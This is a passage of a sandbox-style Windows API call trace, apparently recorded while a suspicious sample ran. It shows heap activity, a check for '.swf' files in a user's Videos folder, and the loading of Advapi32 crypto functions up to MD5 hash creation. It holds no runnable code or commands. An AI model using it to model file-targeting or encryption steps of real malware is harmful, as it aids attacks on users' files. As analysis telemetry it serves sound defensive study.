(HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0193.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0193.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0193.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0193.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0193.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba540 [0193.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0193.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0193.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0193.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0193.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0193.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0193.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0193.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0193.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0193.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0193.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="swf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0193.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".swf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0193.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0193.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0193.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0193.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0193.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0193.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0193.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0193.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0193.161] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\VGkX.swf", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdac5c230, ftCreationTime.dwHighDateTime=0x1d5e3ca, ftLastAccessTime.dwLowDateTime=0x34054cb0, ftLastAccessTime.dwHighDateTime=0x1d5d919, ftLastWriteTime.dwLowDateTime=0x34054cb0, ftLastWriteTime.dwHighDateTime=0x1d5d919, nFileSizeHigh=0x0, nFileSizeLow=0x14d15, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="VGkX.swf", cAlternateFileName="")) returned 0x90ae18 [0193.162] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0193.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0193.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0193.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0193.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0193.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0193.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0193.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0193.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0193.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0193.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0193.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0193.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0193.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0193.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0193.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0193.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0193.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0193.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0193.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0193.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0193.162] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0193.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0193.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0193.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd918 [0193.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0193.163] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0193.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0193.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0193.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9f58 [0193.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0193.163] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0193.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0193.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0193.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0193.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0193.163] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0193.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0193.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0193.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0193.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1970 [0193.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0193.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0193.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0193.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0193.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd5d0 [0193.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0193.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0193.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0193.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0193.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0193.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0193.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0193.164] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0193.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0193.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0193.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd528 [0193.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0193.164] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0193.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0193.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0193.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0193.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0193.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0193.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0193.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0193.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0193.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0193.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0193.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0193.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0193.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0193.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0193.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0193.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0193.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0193.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0193.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0193.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0193.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0193.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0193.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0193.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0193.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0193.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0193.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0193.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0193.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0193.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0193.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0193.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0193.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0193.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0193.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0193.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0193.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0193.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0193.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0193.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0193.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0193.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0193.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0193.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0193.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0193.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0193.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0193.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0193.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0193.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0193.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0193.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0193.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0193.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0193.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0193.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0193.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0193.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0193.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x90d420, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0193.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0193.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0193.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0193.166] GetProcAddress (hModule=0x74f20000, lpProcName="CryptAcquireContext") returned 0x0 [0193.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0193.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0193.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0193.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0193.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0193.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0193.167] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0193.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x15) returned 0x90d420 [0193.167] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x90d420, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0193.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0193.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0193.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0193.167] GetProcAddress (hModule=0x74f20000, lpProcName="CryptAcquireContextA") returned 0x74f291dd [0193.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0193.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0193.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0193.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0193.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0193.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0193.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0193.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0193.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0193.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0193.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0193.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0193.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0193.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0193.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0193.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0193.168] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c00) returned 1 [0193.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0193.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0193.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0193.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0193.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0193.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0193.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0193.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0193.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0193.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0193.169] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0193.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0193.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0193.169] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0193.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0193.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0193.170] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0193.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0193.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0193.170] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0193.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0193.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0193.170] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0193.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0193.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0193.170] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0193.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0193.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0193.183] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0193.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0193.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0193.183] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0193.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0193.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0193.184] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0193.184] CryptCreateHash (in: hProv=0x9c0c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0193.184] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.184] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0193.184] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.184] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.184] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0193.184] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.184] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 